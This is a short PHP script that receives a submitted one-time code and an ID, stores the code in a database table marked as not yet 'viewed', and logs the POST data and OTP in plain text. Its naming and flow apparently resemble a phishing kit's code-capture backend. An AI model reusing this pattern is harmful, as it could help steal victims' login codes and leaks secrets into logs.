<?php
require '../database/database_connection.php';

// Debugging: print POST data
error_log("Received POST data: " . print_r($_POST, true));

// Check if 'otp' and 'uniqueid' are set
if (isset($_POST["otp"]) && isset($_POST["uniqueid"])) {
    $otp = $_POST["otp"];
    $uniqueid = $_POST["uniqueid"];

    // Debugging: Log received values
    error_log("OTP: " . $otp);
    error_log("UniqueID: " . $uniqueid);

    // Using prepared statements to prevent SQL injection
    $stmt = $conn->prepare("UPDATE love SET code=?, status=0, viewed='false' WHERE uniqueid=?");
    $stmt->bind_param('si', $otp, $uniqueid);

    $upload_login_code = $stmt->execute();

    if ($upload_login_code) {
        echo json_encode(array(
            'status' => 'success'
        ));
    } else {
        echo json_encode(array(
            'status' => 'failure',
            'error' => $stmt->error
        ));
    }

    $stmt->close();
} else {
    // Debugging: detailed error message
    $missing = [];
    if (!isset($_POST["otp"])) $missing[] = 'otp';
    if (!isset($_POST["uniqueid"])) $missing[] = 'uniqueid';

    echo json_encode(array(
        'status' => 'failure',
        'error' => 'Missing ' . implode(', ', $missing)
    ));
}

$conn->close();
?>
